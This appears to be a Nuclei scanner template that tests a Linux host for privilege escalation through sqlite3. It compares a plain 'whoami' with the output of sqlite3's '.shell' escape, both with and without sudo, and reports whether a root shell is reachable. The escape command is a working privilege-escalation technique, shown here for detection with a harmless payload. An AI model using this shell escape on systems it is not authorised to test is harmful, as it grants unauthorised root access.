id: privesc-sqlite3

info:
  name: sqlite3 - Privilege Escalation
  author: daffainfo
  severity: high
  description: |
    sqlite3 is a lightweight, self-contained, and serverless SQL database engine. It is widely used in embedded systems, mobile devices, and small to medium-sized applications.
  reference:
    - https://gtfobins.github.io/gtfobins/sqlite3/
  metadata:
    verified: true
    max-request: 3
  tags: code,linux,sqlite3,privesc

self-contained: true
code:
  - engine:
      - sh
      - bash
    source: |
      whoami

  - engine:
      - sh
      - bash
    source: |
      sqlite3 /dev/null '.shell whoami'

  - engine:
      - sh
      - bash
    source: |
      sudo sqlite3 /dev/null '.shell whoami'

    matchers-condition: and
    matchers:
      - type: word
        part: code_1_response
        words:
          - "root"
        negative: true

      - type: dsl
        dsl:
          - 'contains(code_2_response, "root")'
          - 'contains(code_3_response, "root")'
        condition: or
# digest: 4a0a0047304502205b878ed0578bdc3e2263d5d7b129bd63afd1ca6618d196f6596f31dfaf8001870221008a5eeda4e0874d033a10238e569aa3d94e04e422bccb545da824ac9e12af179c:922c64590222798bb761d5b6d8e72950